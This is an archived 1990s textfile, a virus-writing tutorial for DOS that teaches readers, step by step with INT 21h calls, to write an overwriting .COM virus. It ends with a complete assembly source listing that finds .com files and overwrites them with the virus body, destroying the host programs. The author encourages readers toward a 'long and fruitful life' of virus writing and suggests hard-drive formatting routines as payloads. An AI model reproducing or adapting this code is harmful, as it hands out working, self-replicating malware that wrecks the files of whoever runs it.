💾 Archived View for spam.works › mirrors › textfiles › virus › ratboy-1.txt captured on 2023-11-04 at 16:02:49.

View Raw

More Information

⬅️ Previous capture (2023-06-16)

-=-=-=-=-=-=-

 /\---/\     RATBOY'S OVERWRITING VIRUS TUTORIAL
( .   . )
 \     /     WARNING: The information contain within here can be
  \   /      ^^^^^^^  dangerous to you mind and computer!!!!!!!!
   \*/                I assume no responsiblity!!!!!!!!!
    #

        Well here it is my first instructional tutorial.  I felt it was
nesscary for this file since I could not find any tutorials that taught 
virus writing from the basic overwriting virus.  Well that's how I started 
and now I want to show you.  So that you too can have a long and fruitful
life of codeing viruses.  :)

                        OVERWRITING VIRUSES

-=What is an overwritting virus?

I'm glad you asked that.  :)  An overwriting virus is a virus that reproduces
by overwriting the first parts of a program with itself.  Here is an example:

                +-------------------------+        (I got this example from
                |    P R O G R A M        |         40Hex, thanks P/S!!!!)
                +-------------------------+
                         plus:
                +--------+
                | VIRUS! |
                +--------+
                         equals:

                +--------+----------------+
                | VIRUS! | G R A M        |
                +--------+----------------+

        As you can see the first part of the program was overwritten with 
the virus code.  Since important parts of the original program are  
effectivly destroyed it won't ever run, but the virus code will.  
As you can guess overwriting viruses are very destructive and not very 
productive.  But you must learn to walk before you can do the Polka!!


-=So what does one need to know to write an overwriting virus?
Another question I'm glad you asked.  :)  Well having a basic knowledge in 
Assembly is a must, but it is not very differcult.  As a virus writer, I 
only know one programing language, Assembly.  I didn't even learn BASIC.
So don't listen to those that say don't learn Assembly, it's a wonderful
programing language.  At the end of this file I'll be recomending books and
things to do to help ya on your way to Assembly and virus writing.

        Well let's get down to codeing!!!!  :)
We will be dealing with .Com files.  So here is the basic setup for a .Com
file in an Assembly source file:
-----------------------------------------------------------------------------
        CODE    SEGMENT
        ASSUME  CS:CODE,DS:CODE         ;in .Com files the data, code, extra
                                        ;and stack segments are all the same.
        ORG     100H                    ;this is where all .Com files start
                                        ;in memory.  This allows room for the
                                        ;PSP.
STARTVX PROC    NEAR

        blah!                           ;all your virus body goes here
        blah!
        blah!
STARTVX ENDP
        blah!                           ;all your 'db's go here etc..etc...
CODE    ENDS
        END     STARTVX
-----------------------------------------------------------------------------
        
See the set up isn't really hard to follow, but the lack of info in that 
example can be confusing.  We'll get to a full Virus source code a little
later.
        Now what is the basic setup for a simple overwriting virus?  Well
let's look at the order of operations:

(1)     find a file
(2)     open the found file
(3)     write the virus to the opened file (infect it)
(4)     close the file
(5)     exit

Well as you can see there is nothing but pure replication functions in this 
setup.  Well I wanted it to be easy and not to boog you down with encryption,
id bytes, etc...  We are dealing with ZEN and the art of basic viruses!

Here we go looking at these steps of an simple overwriting virus:

(1) FIND FIRST FILE!         
the inputs:
      
        AH: 4EH
        CX: FILE ATTRIBUTES
        DX: OFFSET ADDRESS OF FILE NAME
        DS: SEGMENT ADDRESS OF FILE NAME

Now let's see how we would put this into our little program:

        mov     ah,4eh                    ;find first service
        mov     cx,0000h                  ;we 0'ed cx for normal files
        mov     dx,offset star_com        ;the file mask for .Com file
                                          ;you'll see 
        int     21h
;now of course when you said star_com you need to tell the Assembler what
;you are talking about.  Here it is:

star_com:       db      "*.com",0

;ya see how it will work.  With the use of the wild card '*' the first file
;that has the ending of .com will be found.  This is easy isn't it?

        Now you can see that we didn't need to touch DS: since CS=DS=ES=SS.
So the Star_com already was in the Data Segment.  Yay!!!!!  Love em .Com 
files.  Sorry need to get back on track.

        Now before we can go on and talk about open a found file for writing
to(infecting), we must talk about the Disk Transfer Area (DTA).  When you 
find that first file, information about the file found goes into the DTA,
everything from file name to date of creation.  Here's the setup:

        0h      db      21 dup(0)  ;reserved for DOS uses
        15h     db      00         ;file attributes
        16h     dw      0000       ;file time
        18h     dw      0000       ;file date
        1ah     dd      00000000   ;file size
        1eh     db      13 dup(0)  ;asciiz of the file name.

        That is the layout of the DTA.  Now the DTA lies in the PSP.  The
first 256 (100h) bytes infront of the .Com file.  It's address is 80h.  
Most of the time in virus writing, you would want to move the DTA to a 
location where you can manipulate it without possbile messing up the PSP.
Well for our case, with a simple overwriting virus, we don't need to worry.
All we are going to do is read from the DTA, the file name we just have 
found.  Now this is how we will address the file name, now we know that 
the DTA starts at 80h, and we know that at 1eh from the DTA's begining is
the asciiz of the file name.  So we just add them together and see what we 
get, 80h + 1eh = 9eh.  Well that is were it's located, now let's move on
to the next step.

(2) OPENING THE FOUND FILE!
the inputs:

        AH: 3DH
        AL: 00H    ;opened for reading only
            01H    ;opened for writing only
            02H    ;opened for both reading and writing
        DX: OFFSET ADDRESS OF THE FILE NAME
        DS: SEGMENT ADDRESS OF THE FILE NAME

outputs:
        AX: FILE HANDLE

Now look at it setup in the format we need to know.

        mov     ah,3dh         ;open file
        mov     al,02h         ;open it for reading and writing
        mov     dx,9eh         ;remember this is where the name in the DTA
        int     21h

Now Dos services will return a file handle of the file we just opened.  The 
file handle is nothing more than a number that dos uses to know where it
will read from(the file) or write to(the file).  We don't want it in AX
since the next step that you will see we need it in BX.  Here's a easy way
to move it:
        
        xchg    bx,ax          ;that will put the file handle into bx in one
                               ;step!!!

Ok now the down and dirty stuff.  Infecting the file we just opened. Ha ha!

(3)WRITING TO THE OPENED FILE(INFECTING)
the inputs:

        AH: 40H
        BX: FILE HANDLE
        CX: BYTES TO WRITE
        DX: OFFSET OF ADDRESS OF THE BEGINING OF THE VIRUS

Here we go again with seeing what it will look like:

        mov     ah,40h
        mov     cx,offset endvx - offset startvx ;this will find the virus
                                                 ;lenth, how many bytes to
                                                 ;write....
        mov     dx,offset startvx                ;where the virus starts
        int     21h

Ahhhhhhhhh!  I always feel so relaxed after reproducing....ahh.hh...h!
Oh...where was I, a...well now that we have copied the virus to the file,
now we can close it up.

(4)CLOSE THE FILE! ;Whata-ya live in a barn!
the inputs:
        AX: 3EH
        BX: FILE HANDLE
      
        Now before we go on remember how after we opened the file that we
put the file handle in BX.  So since we didn't mess with BX we should just
have to:

        mov     ah,3eh
        int     21h

        Now for the final and last step the exiting.  Here ya go:
(5)EXIT!

        int     20h

        Well I know it isn't really pretty, but it works.
Well let's look at how all of it fits together:

-----------------------------------------------------------------------------
Code    Segment
        Assume CS:code,DS:code               
        Org     100h                         

startvx proc    near
        
        mov     ah,4eh
        mov     cx,0000h
        mov     dx,offset star_com
        int     21h

        mov     ah,3dh
        mov     al,02h
        mov     dx,9eh
        int     21h

        xchg    bx,ax

        mov     ah,40h
        mov     cx,offset endvx - offset startvx
        mov     dx,offset startvx
        int     21h

        mov     ah,3eh
        int     21h

        int     20h

startvx endp

star_com:       db      "*.com",0

endvx   label   near

code    ends
        end     startvx

-----------------------------------------------------------------------------
        Sorry I didn't put comments in, but that was done so that if you can
not read along and follow what is going on.  You need to re-read this file,
and practice more Assembly.

-=Now that I know overwriting virus programing what can I use them for?
Another fine question.  :)  Overwriting viruses are simple, and being simple
they are fairly easy to follow and program.  That in it's self will help 
educate you in the basics of a virus, writing, reading, find file, etc....
Also since it's fairly easy to write up an overwriting virus you can use them
as test platforms for other routines.  Formating HD's, visual displays, 
encryption, etc.....  This is so that you can concentrate on the how 
the test routine will work not the virus.

-=Now that I have the basics, is that all I need?
OH No, there are many things that you need, the knowledge being the hardest.
Read Assembler Inside and Out, and Using Assembly, they're really good books.
You need, an Assembler(A86+TASM), lot's of source codes to learn from(some
included).  It just dosen't stop there, you will need a some really good 
virus scanners to track what your virus is doing.  F-prot and Tbav are 
great, but if you come up with a virus that is unscannerable they won't work.
That's why I highly recommend INVIRCIBLE.  It will protect you from real 
screw ups, track your virus movement, even unscannibles, even protect you 
from your 'friends' viruses on you computer >:>.  It's the best anti-virus
protection out there, you need to know your enemy, and it's a powerful tool.
The biggest and most important thing you can have is people that are helpful
enough to take the time to answer the questions that form in your mind.  You
will see some of those people in the closing credits of this file.  Talk to
them.  

        Now you are on to a long and fruitful life of making your
        own viruses.  Remember pratice, ask questions, read and
        of course have fun!!!!!!!



Now I would like to take the time to thank a few people:

-=*God, for making me possible
-=*My Wife, for putting up with me!!
-=*FC, thanks for all the info and help, dude!!!
-=*Invircible, yea I know it's a piece of software, but it has covered my but
   enough times.  Thanks Mike!!!!!!!!!!!!!!!!!
-=*Aristotle, yea Aristotle, the dude help start me out.
-=*Vlad, Immortal Riot, NuKE, Falcon, P/S, Mad Arab, Terminal Velocity..etc..